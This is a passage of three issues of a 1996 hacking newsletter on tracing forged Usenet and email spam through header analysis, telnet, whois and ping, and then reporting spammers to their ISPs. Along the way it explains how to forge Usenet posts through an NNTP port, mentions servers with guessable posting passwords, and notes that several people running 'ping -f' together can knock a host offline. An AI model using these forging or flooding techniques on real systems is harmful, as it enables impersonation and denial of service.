<joe.blow@boring.ISP.net>" substituting your real email address for Joe Blow's.
___________________________________________________________________
+559
View File
@@ -0,0 +1,559 @@
_______________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 1 Number 4
It's vigilante phun day! How get Usenet spammers kicked off their ISPs.
_______________________________________________________
How do you like it when your sober news groups get hit with 900 number sex
ads and Make Money Fast pyramid schemes? If no one ever made those guys pay
for their effrontery, soon Usenet would be inundated with crud.
It's really tempting, isn't it, to use our hacking knowledge to blow these
guys to kingdom come. But many times that's like using an atomic bomb to
kill an ant. Why risk going to jail when there are legal ways to keep these
vermin of the Internet on the run?
This issue of Happy hacker will show you some ways to fight Usenet spam.
Spammers rely on forged email and Usenet posts. As we learned in the second
Guide to (mostly) Harmless Hacking, it is easy to fake email. Well, it's
also easy to fake Usenet posts.
*****************
Newbie Note #1: Usenet is a part of the Internet consisting of the system of
on-line discussion groups called "news groups." Examples of news groups are
rec.humor, comp.misc, news.announce.newusers, sci.space.policy, and alt.sex.
There are well over 10,000 news groups. Usenet started out in 1980 as a Unix
network linking people who wanted -- you guessed it -- to talk about Unix.
Then some of the people wanted to talk about stuff like physics, space
flight, barroom humor, and sex. The rest is history.
*****************
Here's a quick summary of how to forge Usenet posts. Once again, we use the
technique of telnetting to a specific port. The Usenet port usually is open
only to those with accounts on that system. So you will need to telnet from
your ISP shell account back into your own ISP as follows:
telnet news.myISP.com nntp
where you substitute the part of your email address that follows the @ for
"myISP.com." You also have the choice of using "119" instead of "nntp."
With my ISP I get this result:
Trying 198.59.115.25 ...
Connected to sloth.swcp.com.
Escape character is '^]'.
200 sloth.swcp.com InterNetNews NNRP server INN 1.4unoff4 05- Mar-96
ready (posting)
Now when we are suddenly in a program that we don't know too well, we ask for:
help
And we get:
100 Legal commands
authinfo user Name|pass Password|generic <prog> <args>
article [MessageID|Number]
body [MessageID|Number]
date
group newsgroup
head [MessageID|Number]
help
ihave
last
list [active|newsgroups|distributions|schema]
listgroup newsgroup
mode reader
newgroups yymmdd hhmmss ["GMT"] [<distributions>]
newnews newsgroups yymmdd hhmmss ["GMT"] [<distributions>]
next
post
slave
stat [MessageID|Number]
xgtitle [group_pattern]
xhdr header [range|MessageID]
xover [range]
xpat header range|MessageID pat [morepat...]
xpath MessageID
Report problems to <usenet@swcp.com>
Use your imagination with these commands. Also, if you want to forge posts
from an ISP other than your own, keep in mind that some Internet host
computers have an nntp port that requires either no password or an easily
guessed password such as "post." But-- it can be quite an effort to find an
undefended nntp port. So, because you usually have to do this on your own
ISP, this is much harder than email forging.
Just remember when forging Usenet posts that both faked email and Usenet
posts can be easily detected -- if you know what to look for. And it is
possible to tell where they were forged. Once you identify where spam really
comes from, you can use the message ID to show the sysadmin who to kick out.
Normally you won't be able to learn the identity of the culprit yourself.
But you can get their ISPs to cancel their accounts!
Sure, these Spam King types often resurface with yet another gullible ISP.
But they are always on the run. And, hey, when was the last time you got a
Crazy Kevin "Amazing Free Offer?" If it weren't for us Net vigilantes, your
email boxes and news groups would be constantly spambombed to kingdom come.
And -- the spam attack I am about to teach you is perfectly legal! Do it and
you are a certifiable Good Guy. Do it at a party and teach your friends to
do it, too. We can't get too many spam vigilantes out there!
The first thing we have to do is review how to read headers of Usenet posts
and email.
The header is something that shows the route that email or Usenet post took
to get into your computer. It gives the names of Internet host computers
that have been used in the creation and transmission of a message. When
something has been forged, however, the computer names may be fake.
Alternatively, the skilled forger may use the names of real hosts. But the
skilled hacker can tell whether a host listed in the header was really used.
First we'll try an example of forged Usenet spam. A really good place to
spot spam is in alt.personals. It is not nearly as well policed by anti-spam
vigilantes as, say, rec.aviation.military. (People spam fighter pilots at
their own risk!)
So here is a ripe example of scam spam, as shown with the Unix-based Usenet
reader, "tin."
Thu, 22 Aug 1996 23:01:56 alt.personals Thread 134 of 450
Lines 110 >>>>FREE INSTANT COMPATIBILITY CHECK FOR SEL No responses
ppgc@ozemail.com.au glennys e clarke at OzEmail Pty Ltd - Australia
CLICK HERE FOR YOUR FREE INSTANT COMPATIBILITY CHECK!
http://www.perfect-partners.com.au
WHY SELECTIVE SINGLES CHOOSE US
At Perfect Partners (Newcastle) International we are private and
confidential. We introduce ladies and gentlemen for friendship
and marriage. With over 15 years experience, Perfect Partners is one
of the Internet's largest, most successful relationship consultants.
Of course the first thing that jumps out is their return email address. Us
net vigilantes used to always send a copy back to the spammer's email address.
On a well-read group like alt.personals, if only one in a hundred readers
throws the spam back into the poster's face, that's an avalanche of mail
bombing. This avalanche immediately alerts the sysadmins of the ISP to the
presence of a spammer, and good-bye spam account.
So in order to delay the inevitable vigilante response, today most spammers
use fake email addresses.
But just to be sure the email address is phony, I exit tin and at the Unix
prompt give the command:
whois ozemail.com.au
We get the answer:
No match for "OZEMAIL.COM.AU"
That doesn't prove anything, however, because the "au" at the end of the
email address means it is an Australian address. Unfortunately "whois" does
not work in much of the Internet outside the US.
The next step is to email something annoying to this address. A copy of the
offending spam is usually annoying enough. But of course it bounces back
with a no such address message.
Next I go to the advertised Web page. Lo and behold, it has an email address
for this outfit, perfect.partners@hunterlink.net.au. Why am I not surprised
that it is different from the address in the alt.personals spam?
We could stop right here and spend an hour or two emailing stuff with 5 MB
attachments to perfect.partners@hunterlink.net.au. Hmmm, maybe gifs of
mating hippopotami?
***************************
You can go to jail note! Mailbombing is a way to get into big trouble.
According to computer security expert Ira Winkler, "It is illegal to mail
bomb a spam. If it can be shown that you maliciously caused a financial
loss, which would include causing hours of work to recover from a spamming,
you are criminally liable. If a system is not configured properly, and has
the mail directory on the system drive, you can take out the whole system.
That makes it even more criminal."
***************************
Sigh. Since intentional mailbombing is illegal, I can't send that gif of
mating hippopotami. So what I did was email one copy of that spam back to
perfect.partners. Now this might seem like a wimpy retaliation. And we will
shortly learn how to do much more. But even just sending one email message
to these guys may become part of a tidal wave of protest that knocks them
off the Internet. If only one in a thousand people who see their spam go to
their Web site and email a protest, they still may get thousands of protests
from every post. This high volume of email may be enough to alert their
ISP's sysadmin to spamming, and good-bye spam account.
Look at what ISP owner/operator Dale Amon has to say about the power of
email protest:
"One doesn't have to call for a 'mail bomb.' It just happens. Whenever I see
spam, I automatically send one copy of their message back to them. I figure
that thousands of others are doing the same. If they (the spammers) hide
their return address, I find it and post it if I have time. I have no
compunctions and no guilt over it."
Now Dale is also the owner and technical director of the largest and oldest
ISP in Northern Ireland, so he knows some good ways to ferret out what ISP
is harboring a spammer. And we are about learn one of them.
Our objective is to find out who connects this outfit to the Internet, and
take out that connection! Believe me, when the people who run an ISP find
out one of their customers is a spammer, they usually waste no time kicking
him or her out.
Our first step will be to dissect the header of this post to see how it was
forged and where.
Since my newsreader (tin) doesn't have a way to show headers, I use the "m"
command to email a copy of this post to my shell account.
It arrives a few minutes later. I open it in the email program "Pine" and
get a richly detailed header:
Path:
sloth.swcp.com!news.ironhorse.com!news.uoregon.edu!vixen.cso.uiuc.edu!news.s
tealth.net!nntp04.primenet.com!nntp.primenet.com!gatech!nntp0.mindspring.com
!news.mindspring.com!uunet!in2.uu.net!OzEmail!OzEmail-In!news
From: glennys e clarke <ppgc@ozemail.com.au>
NNTP-Posting-Host: 203.15.166.46
Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Mozilla 1.22 (Windows; I; 16bit)
The first item in this header is definitely genuine: sloth.swcp.com. It's
the computer my ISP uses to host the news groups. It was the last link in
the chain of computers that have passed this spam around the world.
*******************
Newbie Note #2: Internet host computers all have names which double as their
Net addresses. "Sloth" is the name of one of the computers owned by the
company which has the "domain name" swcp.com. So "sloth" is kind of like the
news server computer's first name, and "swcp.com" the second name. "Sloth"
is also kind of like the street address, and "swcp.com" kind of like the
city, state and zip code. "Swcp.com" is the domain name owned by Southwest
Cyberport. All host computers also have numerical versions of their names,
e.g. 203.15.166.46.
*******************
Let's next do the obvious. The header says this post was composed on the
host 203.15.166.46. So we telnet to its nntp server (port 119):
telnet 203.15.166.46 119
We get back:
Trying 203.15.166.46 ...
telnet: connect: Connection refused
This looks a lot like a phony item in the header. If this really was a
computer that handles news groups, it should have a nntp port that accepts
visitors. It might only accept a visitor for the split second it takes to
see that I am not authorized to use it. But in this case it refuses any
connection whatever.
There is another explanation: there is a firewall on this computer that
filters out packets from anyone but authorized users. But this is not common
in an ISP that would be serving a spammer dating service. This kind of
firewall is more commonly used to connect an internal company computer
network with the Internet.
Next I try to email postmaster@203.15.166.46 with a copy of the spam. But I
get back:
Date: Wed, 28 Aug 1996 21:58:13 -0600
From: Mail Delivery Subsystem <MAILER-DAEMON@techbroker.com>
To: cmeinel@techbroker.com
Subject: Returned mail: Host unknown (Name server: 203.15.166.46: host not
found)
The original message was received at Wed, 28 Aug 1996 21:58:06 -0600
from cmeinel@localhost
----- The following addresses had delivery problems -----
postmaster@203.15.166.46 (unrecoverable error)
----- Transcript of session follows -----
501 postmaster@203.15.166.46... 550 Host unknown (Name server: 203.15.166.46:
host not found)
----- Original message follows -----
Return-Path: cmeinel
Received: (from cmeinel@localhost) by kitsune.swcp.com (8.6.9/8.6.9) id
OK, it looks like the nntp server info was forged, too.
Next we check the second from the top item on the header. Because it starts
with the word "news," I figure it must be a computer that hosts news groups,
too. So I check out its nntp port:
telnet news.ironhorse.com nntp
And the result is:
Trying 204.145.167.4 ...
Connected to boxcar.ironhorse.com.
Escape character is '^]'.
502 You have no permission to talk. Goodbye.
Connection closed by foreign host
OK, we now know that this part of the header references a real news server.
Oh, yes, we have also just learned the name/address of the computer
ironhorse.com uses to handle the news groups: "boxcar."
I try the next item in the path:
telnet news.uoregon.edu nntp
And get:
Trying 128.223.220.25 ...
Connected to pith.uoregon.edu.
Escape character is '^]'.
502 You have no permission to talk. Goodbye.
Connection closed by foreign host.
OK, this one is a valid news server, too. Now let's jump to the last item in
the header: in2.uu.net:
telnet in2.uu.net nntp
We get the answer:
in2.uu.net: unknown host
There is something fishy here. This host computer in the header isn't
currently connected to the Internet. It probably is forged. Let's check the
domain name next:
whois uu.net
The result is:
UUNET Technologies, Inc. (UU-DOM)
3060 Williams Drive Ste 601
Fairfax, VA 22031
USA
Domain Name: UU.NET
Administrative Contact, Technical Contact, Zone Contact:
UUNET, AlterNet [Technical Support] (OA12) help@UUNET.UU.NET
+1 (800) 900-0241
Billing Contact:
Payable, Accounts (PA10-ORG) ap@UU.NET
(703) 206-5600
Fax: (703) 641-7702
Record last updated on 23-Jul-96.
Record created on 20-May-87.
Domain servers in listed order:
NS.UU.NET 137.39.1.3
UUCP-GW-1.PA.DEC.COM 16.1.0.18 204.123.2.18
UUCP-GW-2.PA.DEC.COM 16.1.0.19
NS.EU.NET 192.16.202.11
The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.
So uu.net is a real domain. But since the host computer in2.uu.net listed in
the header isn't currently connected to the Internet, this part of the
header may be forged. (However, there may be other explanations for this, too.)
Working back up the header, then, we next try:
telnet news.mindspring.com nntp
I get:
Trying 204.180.128.185 ...
Connected to news.mindspring.com.
Escape character is '^]'.
502 You are not in my access file. Goodbye.
Connection closed by foreign host.
Interesting. I don't get a specific host name for the nntp port. What does
this mean? Well, there's a way to try. Let's telnet to the port that gives
the login sequence. That's port 23, but telnet automatically goes to 23
unless we tell it otherwise:
telnet news.mindspring.com
Now this is phun!
Trying 204.180.128.166 ...
telnet: connect to address 204.180.128.166: Connection refused
Trying 204.180.128.167 ...
telnet: connect to address 204.180.128.167: Connection refused
Trying 204.180.128.168 ...
telnet: connect to address 204.180.128.168: Connection refused
Trying 204.180.128.182 ...
telnet: connect to address 204.180.128.182: Connection refused
Trying 204.180.128.185 ...
telnet: connect: Connection refused
Notice how many host computers are tried out by telnet on this command! They
must all specialize in being news servers, since none of them handles logins.
This looks like a good candidate for the origin of the spam. There are 5
news server hosts. Let's do a whois command on the domain name next:
whois mindspring.com
We get:
MindSpring Enterprises, Inc. (MINDSPRING-DOM)
1430 West Peachtree Street NE
Suite 400
Atlanta, GA 30309
USA
Domain Name: MINDSPRING.COM
Administrative Contact:
Nixon, J. Fred (JFN) jnixon@MINDSPRING.COM
404-815-0770
Technical Contact, Zone Contact:
Ahola, Esa (EA55) hostmaster@MINDSPRING.COM
(404)815-0770
Billing Contact:
Peavler, K. Anne (KAP4) peavler@MINDSPRING.COM
404-815-0770 (FAX) 404-815-8805
Record last updated on 27-Mar-96.
Record created on 21-Apr-94.
Domain servers in listed order:
CARNAC.MINDSPRING.COM 204.180.128.95
HENRI.MINDSPRING.COM 204.180.128.3
*********************
Newbie Note #3: The whois command can tell you who owns a domain name. The
domain name is the last two parts separated by a period that comes after the
"@" in an email address, or the last two parts separated by a period in a
computer's name.
*********************
I'd say that Mindspring is the ISP from which this post was most likely
forged. The reason is that this part of the header looks genuine, and offers
lots of computers on which to forge a post. A letter to the technical
contact at hostmaster@mindspring.com with a copy of this post may get a result.
But personally, I would simply go to their Web site and email them a protest
from there. Hmmm, maybe a 5 MB gif of mating hippos? Even if it is illegal?
But systems administrator Terry McIntyre cautions me:
"One needn't toss megabyte files back ( unless, of course, one is helpfully
mailing a copy of the offending piece back, just so that the poster knows
what the trouble was. )
"The Law of Large Numbers of Offendees works to your advantage. Spammer
sends one post to 'reach out and touch' thousands of potential customers.
"Thousands of Spammees send back oh-so-polite notes about the improper
behavior of the Spammer. Most Spammers get the point fairly quickly.
"One note - one _wrong_ thing to do is to post to the newsgroup or list
about the inappropriateness of any previous post. Always, always, use
private email to make such complaints. Otherwise, the newbie inadvertently
amplifies the noise level for the readers of the newsgroup or email list."
Well, the bottom line is that if I really want to pull the plug on this
spammer, I would send a polite note including the Usenet post with headers
intact to the technical contact and/or postmaster at each of the valid links
I found in this spam header. Chances are that they will thank you for your
sleuthing.
Here's an example of an email I got from Netcom about a spammer I helped
them to track down.
From: Netcom Abuse Department <abuse@netcom.com>
Reply-To: <abuse@netcom.com>
Subject: Thank you for your report
Thank you for your report. We have informed this user of our policies, and
have taken appropriate action, up to, and including cancellation of the
account, depending on the particular incident. If they continue to break
Netcom policies we will take further action.
The following issues have been dealt with:
santigo@ix.netcom.com
date-net@ix.netcom.com
jhatem@ix.netcom.com
kkooim@ix.netcom.com
duffster@ix.netcom.com
spilamus@ix.netcom.com
slatham@ix.netcom.com
jwalker5@ix.netcom.com
binary@ix.netcom.com
clau@ix.netcom.com
frugal@ix.netcom.com
magnets@ix.netcom.com
sliston@ix.netcom.com
aessedai@ix.netcom.com
ajb1968@ix.netcom.com
readme@readme.net
captainx@ix.netcom.com
carrielf@ix.netcom.com
charlene@ix.netcom.com
fonedude@ix.netcom.com
nickshnn@netcom.com
prospnet@ix.netcom.com
alluvial@ix.netcom.com
hiwaygo@ix.netcom.com
falcon47@ix.netcom.com
iggyboo@ix.netcom.com
joyful3@ix.netcom.com
kncd@ix.netcom.com
mailing1@ix.netcom.com
niterain@ix.netcom.com
mattyjo@ix.netcom.com
noon@ix.netcom.com
rmerch@ix.netcom.com
rthomas3@ix.netcom.com
rvaldes1@ix.netcom.com
sia1@ix.netcom.com
thy@ix.netcom.com
vhs1@ix.netcom.com
Sorry for the length of the list.
Spencer
Abuse Investigator
___________________________________________________________________
NETCOM Online Communication Services Abuse Issues
24-hour Support Line: 408-983-5970 abuse@netcom.com
**************
OK, I'm signing off for this column. I look forward to your contributions to
this list. Happy hacking -- and don't get busted!
__________________________________________________________________
Want to share some kewl stuph? Tell me I'm terrific? Flame me? For the first
two, I'm at cmeinel@techbroker.com. Please direct flames to
dev/null@techbroker.com. Happy hacking!
_______________________________________________________
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly)
HARMLESS HACKING as long as you leave this notice at the end. To subscribe,
email cmeinel@techbroker.com with message "subscribe hacker
<joe.blow@boring.ISP.net>" substituting your real email address for Joe Blow's.
___________________________________________________________________
+325
View File
@@ -0,0 +1,325 @@
_______________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 1 Number 5
It's vigilante phun day again! How get email spammers kicked off their ISPs.
_______________________________________________________
So, have you been out on Usenet blasting spammers? It's phun, right?
But if you have ever done much posting to Usenet news groups, you will
notice that soon after you post, you will often get spam email. This is
mostly thanks to Lightning Bolt, a program written by Jeff Slayton to strip
huge volumes of email addresses from Usenet posts.
Here's one I recently got:
Received: from mail.gnn.com (70.los-angeles-3.ca.dial-access.att.net
[165.238.38.70]) by mail-e2b-service.gnn.com (8.7.1/8.6.9) with SMTP id
BAA14636; Sat, 17 Aug 1996 01:55:06 -0400 (EDT)
Date: Sat, 17 Aug 1996 01:55:06 -0400 (EDT)
Message-Id: <199608170555.BAA14636@mail-e2b-service.gnn.com>
To:
Subject: Forever
From: FREE@Heaven.com
"FREE" House and lot in "HEAVEN"
Reserve yours now, do it today, do not wait. It is FREE
just for the asking. You receive a Personalized Deed and detailed Map to
your home in HEAVEN. Send your name and address along with a one time
minimum donation of $1.98 cash, check, or money order to
help cover s/h cost
TO: Saint Peter's Estates
P.O. Box 9864
Bakersfield,CA 93389-9864
This is a gated community and it is "FREE".
Total satisfaction for 2 thousand years to date.
>From the Gate Keeper. (PS. See you at the Pearly Gates)
GOD will Bless you.
Now it is a pretty good guess that this spam has a forged header. To
identify the culprit, we employ the same command that we used with Usenet spam:
whois heaven.com
We get the answer:
Time Warner Cable Broadband Applications (HEAVEN-DOM)
2210 W. Olive Avenue
Burbank, CA 91506
Domain Name: HEAVEN.COM
Administrative Contact, Technical Contact, Zone Contact, Billing Contact:
Melo, Michael (MM428) michael@HEAVEN.COM
(818) 295-6671
Record last updated on 02-Apr-96.
Record created on 17-Jun-93.
Domain servers in listed order:
CHEX.HEAVEN.COM 206.17.180.2
NOC.CERF.NET 192.153.156.22
>From this we conclude that this is either genuine (fat chance) or a better
forgery than most. So let's try to finger FREE@heaven.com.
First, let's check out the return email address:
finger FREE@heaven.com
We get:
[heaven.com]
finger: heaven.com: Connection timed out
There are several possible reasons for this. One is that the systems
administrator for heaven.com has disabled the finger port. Another is that
heaven.com is inactive. It could be on a host computer that is turned off,
or maybe just an orphan.
*********************
Newbie note: You can register domain names without setting them up on a
computer anywhere. You just pay your money and Internic, which registers
domain names, will put it aside for your use. However, if you don't get it
hosted by a computer on the Internet within a few weeks, you may loose your
registration.
*********************
We can test these hypotheses with the ping command. This command tells you
whether a computer is currently hooked up to the Internet and how good its
connection is.
Now ping, like most kewl hacker tools, can be used for either information or
as a means of attack. But I am going to make you wait in dire suspense for a
later Guide to (mostly) Harmless Hacking to tell you how some people use
ping. Besides, yes, it would be *illegal* to use ping as a weapon.
Because of ping's potential for mayhem, your shell account may have disabled
the use of ping for the casual user. For example, with my ISP I have to go
to the right directory to use it. So I give the command:
/usr/etc/ping heaven.com
The result is:
heaven.com is alive
***********************
Technical Tip: On some versions of Unix,giving the command "ping" will start
your computer pinging the target over and over again without stopping. To
get out of the ping command, hold down the control key and type "c". And be
patient, next Guide to (mostly) Harmless Hacking will tell you more about
the serious hacking uses of ping.
***********************
Well, this answer means heaven.com is hooked up to the Internet right now.
Does it allow logins? We test this with:
telnet heaven.com
This should get us to a screen that would ask us to give user name and
password. The result is:
Trying 198.182.200.1 ...
telnet: connect: Connection timed out
OK, now we know that people can't remotely log in to heaven.com. So it sure
looks as if it was an unlikely place for the author of this spam to have
really sent this email.
How about chex.heaven.com? Maybe it is the place where spam originated? I
type in:
telnet chex.heaven.com 79
This is the finger port. I get:
Trying 206.17.180.2 ...
telnet: connect: Connection timed out
I then try to get a screen that would ask me to login with user name, but
once again get "Connection timed out."
This suggests strongly that neither heaven.com or chex.heaven.com are being
used by people to send email. So this is probably a forged link in the header.
Let's look at another link on the header:
whois gnn.com
The answer is:
America Online (GNN2-DOM)
8619 Westwood Center Drive
Vienna, VA 22182
USA
Domain Name: GNN.COM
Administrative Contact:
Colella, Richard (RC1504) colella@AOL.NET
703-453-4427
Technical Contact, Zone Contact:
Runge, Michael (MR1268) runge@AOL.NET
703-453-4420
Billing Contact:
Lyons, Marty (ML45) marty@AOL.COM
703-453-4411
Record last updated on 07-May-96.
Record created on 22-Jun-93.
Domain servers in listed order:
DNS-01.GNN.COM 204.148.98.241
DNS-AOL.ANS.NET 198.83.210.28
Whoa! GNN.com is owned by America Online. Now America Online, like
Compuserve, is a computer network of its own that has gateways into the
Internet. So it isn't real likely that heaven.com would be routing email
through AOL, is it? It would be almost like finding a header that claims its
email was routed through the wide area network of some Fortune 500
corporation. So this gives yet more evidence that the first link in the
header, heaven.com, was forged.
In fact, it's starting to look like a good bet that our spammer is some
newbie who just graduated from AOL training wheels. Having decided there is
money in forging spam, he or she may have gotten a shell account offered by
the AOL subsidiary, GNN. Then with a shell account he or she could get
seriously into forging email.
Sounds logical, huh? Ah, but let's not jump to conclusions. This is just a
hypothesis and it may be wrong. So let's check out the remaining link in
this header:
whois att.net
The answer is:
AT&T EasyLink Services (ATT2-DOM)
400 Interpace Pkwy
Room B3C25
Parsippany, NJ 07054-1113
US
Domain Name: ATT.NET
Administrative Contact, Technical Contact, Zone Contact:
DNS Technical Support (DTS-ORG) hostmaster@ATTMAIL.COM
314-519-5708
Billing Contact:
Gardner, Pat (PG756) pegardner@ATTMAIL.COM
201-331-4453
Record last updated on 27-Jun-96.
Record created on 13-Dec-93.
Domain servers in listed order:
ORCU.OR.BR.NP.ELS-GMS.ATT.NET199.191.129.139
WYCU.WY.BR.NP.ELS-GMS.ATT.NET199.191.128.43
OHCU.OH.MT.NP.ELS-GMS.ATT.NET199.191.144.75
MACU.MA.MT.NP.ELS-GMS.ATT.NET199.191.145.136
Another valid domain! So this is a reasonably ingenious forgery. The culprit
could have sent email from any of heaven.com, gnn.com or att.net. We know
heaven.com is highly unlikely because we can't get even the login port to
work. But we still have gnn.com and att.net as suspected homes for this spammer.
The next step is to email a copy of this spam *including headers* to both
postmaster@gnn.com (usually a good guess for the email address of the person
who takes complaints) and runge@AOL.NET, who is listed by whois as the
technical contact. We should also email either postmaster@att.net (the good
guess) or hostmaster@ATTMAIL.COM (technical contact).
Presumably one of the people reading email sent to these addresses will use
the email message id number to look up who forged this email. Once the
culprit is discovered, he or she usually is kicked out of the ISP.
But here is a shortcut. If you have been spammed by this guy, lots of other
people probably have been, too. There's a news group on the Usenet where
people can exchange information on both email and Usenet spammers,
news.admin.net-abuse.misc. Let's pay it a visit and see what people may have
dug up on FREE@heaven.com. Sure enough, I find a post on this heaven scam:
From: bartleym@helium.iecorp.com (Matt Bartley)
Newsgroups: news.admin.net-abuse.misc
Subject: junk email - Free B 4 U - FREE@Heaven.com
Supersedes: <4uvq4a$3ju@helium.iecorp.com>
Date: 15 Aug 1996 14:08:47 -0700
Organization: Interstate Electronics Corporation
Lines: 87
Message-ID: <4v03kv$73@helium.iecorp.com>
NNTP-Posting-Host: helium.iecorp.com
(snip)
No doubt a made-up From: header which happened to hit a real domain
name.
Postmasters at att.net, gnn.com and heaven.com notified. gnn.com has
already stated that it came from att.net, forged to look like it came from
gnn. Clearly the first Received: header is inconsistent.
Now we know that if you want to complain about this spam, the best place to
send a complaint is postmaster@att.net.
But how well does writing a letter of complaint actually work? I asked ISP
owner Dale Amon. He replied, "From the small number of spam messages I have
been seeing - given the number of generations of exponential net growth I
have seen in 20 years - the system appears to be *strongly* self regulating.
Government and legal systems don't work nearly so well.
"I applaud Carolyn's efforts in this area. She is absolutely right. Spammers
are controlled by the market. If enough people are annoyed, they respond. If
that action causes problems for an ISP it puts it in their economic interest
to drop customers who cause such harm, ie the spammers. Economic interest is
often a far stronger and much more effective incentive than legal requirement.
"And remember that I say this as the Technical Director of the largest ISP
in Northern Ireland."
How about suing spammers? Perhaps a bunch of us could get together a class
action suit and drive these guys into bankruptcy?
Systems administrator Terry McIntyre argues, "I am opposed to attempts to
sue spammers. We already have a fairly decent self-policing mechanism in place.
"Considering that half of everybody on the internet are newbies (due to the
100% growth rate), I'd say that self-policing is marvelously effective.
"Invite the gov't to do our work for us, and some damn bureaucrats will
write up Rules and Regulations and Penalties and all of that nonsense. We
have enough of that in the world outside the 'net; let's not invite any of
it to follow us onto the 'net."
So it looks like Internet professionals prefer to control spam by having net
vigilantes like us track down spammers and report them to their ISPs. Sounds
like phun to me! In fact, it would be fair to say that without us net
vigilantes, the Internet would probably grind to a halt from the load these
spammers would place on it.
OK, I'm signing off for this column. I look forward to your contributions to
this list. Have some vigilante phun -- and don't get busted!
__________________________________________________________________
Want to share some kewl stuph? Tell me I'm terrific? Flame me? For the first
two, I'm at cmeinel@techbroker.com. Please direct flames to
dev/null@techbroker.com. Happy hacking!
_______________________________________________________
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly)
HARMLESS HACKING as long as you leave this notice at the end. To subscribe,
email cmeinel@techbroker.com with message "subscribe hacker
<joe.blow@boring.ISP.net>" substituting your real email address for Joe Blow's.
___________________________________________________________________
+458
View File
@@ -0,0 +1,458 @@
_______________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 1 Number 6
It's vigilante phun day one more time! How to nuke offensive Web sites.
_______________________________________________________
How do we deal with offensive Web sites?
Remember that the Internet is voluntary. There is no law that forces an ISP
to serve people they don't like. As the spam kings Jeff Slayton, Crazy
Kevin, and, oh, yes, the original spam artists Cantor and Siegal have
learned, life as a spammer is life on the run. The same holds for Web sites
that go over the edge.
The reason I bring this up is that a Happy Hacker list member has told me he
would like to vandalize kiddie porn sites. I think that is a really, really
kewl idea -- except for one problem. You can get thrown in jail! I don't
want the hacker tools you can pick up from public Web and ftp sites to lure
anyone into getting busted. It is easy to use them to vandalize Web sites.
But it is hard to use them without getting caught!
*****************
YOU CAN GO TO JAIL NOTE: Getting into a part of a computer that is not open
to the public is illegal. In addition, if you use the phone lines or
Internet across a US state line to break into a non-public part of a
computer, you have committed a Federal felony. You don't have to cause any
harm at all -- it's still illegal. Even if you just gain root access and
immediately break off your connection -- it's still illegal. Even if you are
doing what you see as your civic duty by vandalizing kiddie porn -- it's
still illegal.
***************
Here's another problem. It took just two grouchy hacker guys to get the
DC-stuff list turned off . Yes, it *will* be back, eventually. But what if
the Internet were limited to carrying only stuff that was totally
inoffensive to everyone? That's why it is against the law to just nuke ISPs
and Web servers you don't like. Believe me, as you will soon find out, it is
really easy to blow an Internet host off the Internet. It is *so* easy that
doing this kind of stuph is NOT elite!
So what's the legal alternative to fighting kiddie porn? Trying to throw Web
kiddie porn guys in jail doesn't always work. While there are laws against
it in the US, the problem is that the Internet is global. Many countries
have no laws against kiddie porn on the Internet. Even if it were illegal
everywhere, in lots of countries the police only bust people in exchange for
you paying a bigger bribe than the criminal pays.
*******************
They can go to jail note: In the US and many other countries, kiddie porn is
illegal. If the imagery is hosted on a physical storage device within the
jurisdiction of a country with laws against it, the person who puts this
imagery on the storage device can go to jail. So if you know enough to help
the authorities get a search warrant, by all means contact them. In the US,
this would be the FBI.
*******************
But the kind of mass outrage that keeps spammers on the run can also drive
kiddie porn off the Web. *We* have the power.
The key is that no one can force an ISP to carry kiddie porn -- or anything
else. In fact, most human beings are so disgusted at kiddie porn that they
will jump at the chance to shut it down. If the ISP is run by some pervert
who wants to make money by offering kiddie porn, then you go to the next
level up, to the ISP that provides connectivity for the kiddie porn ISP.
There someone will be delighted to cut off the b*****ds.
So, how do you find the people who can put a Web site on the run? We start
with the URL.
I am going to use a real URL. But please keep in mind that I am not saying
this actually is a web address with kiddie porn. This is being used for
purposes of illustration only because this URL is carried by a host with so
many hackable features. It also, by at least some standards, carries X-rated
material. So visit it at your own risk.
http://www.phreak.org
Now let's say someone just told you this was a kiddie porn site. Do you just
launch an attack? No.
This is how hacker wars start. What if phreak.org is actually a nice guy
place? Even if they did once display kiddie porn, perhaps they have
repented. Not wanting to get caught acting on a stupid rumor, I go to the
Web and find the message "no DNS entry." So this Web site doesn't look like
it's there just now.
But it could just be the that the machine that runs the disk that holds this
Web site is temporarily down. There is a way to tell if the computer that
serves a domain name is running: the ping command:
/usr/etc/ping phreak.org
The answer is:
/usr/etc/ping: unknown host phreak.org
Now if this Web site had been up, it would have responded like my Web site does:
/usr/etc/ping techbroker.com
This gives the answer:
techbroker.com is alive
*************************
Evil Genius Note: Ping is a powerful network diagnostic tool. This example
is from BSD Unix. Quarterdeck Internet Suite and many other software
packages also offer this wimpy version of the ping command. But in its most
powerful form -- which you can get by installing Linux on your computer --
the ping-f command will send out packets as fast as the target host can
respond for an indefinite length of time. This can keep the target extremely
busy and may be enough to put the computer out of action. If several people
do this simultaneously, the target host will almost certainly be unable to
maintain its network connection. So -- *now* do you want to install Linux?
*************************
*************************
Netiquette warning: "Pinging down" a host is incredibly easy. It's way too
easy to be regarded as elite, so don't do it to impress your friends. If you
do it anyhow, be ready to be sued by the owner of your target and kicked off
your ISP-- or much worse! If you should accidentally get the ping command
running in assault mode, you can quickly turn it off by holding down the
control key while pressing the "c" key.
*************************
*************************
You can go to jail warning: If it can be shown that you ran the ping-f
command on purpose to take out the host computer you targeted, this is a
denial of service attack and hence illegal.
************************
OK, now we have established that at least right now, http://phreak.com
either does not exist, or else that the computer hosting it is not connected
to the Internet.
But is this temporary or is it gone, gone, gone? We can get some idea
whether it has been up and around and widely read from the search engine at
http://altavista.digital.com. It is able to search for links embedded in Web
pages. Are there many Web sites with links to phreak.org? I put in the
search commands:
link: http://www.phreak.org
host: http://www.phreak.org
But they turn up nothing. So it looks like the phreak.org site is not real
popular.
Well, does phreak.org have a record at Internic? Let's try whois:
whois phreak.org
Phreaks, Inc. (PHREAK-DOM)
Phreaks, Inc.
1313 Mockingbird Lane
San Jose, CA 95132 US
Domain Name: PHREAK.ORG
Administrative Contact, Billing Contact:
Connor, Patrick (PC61) pc@PHREAK.ORG
(408) 262-4142
Technical Contact, Zone Contact:
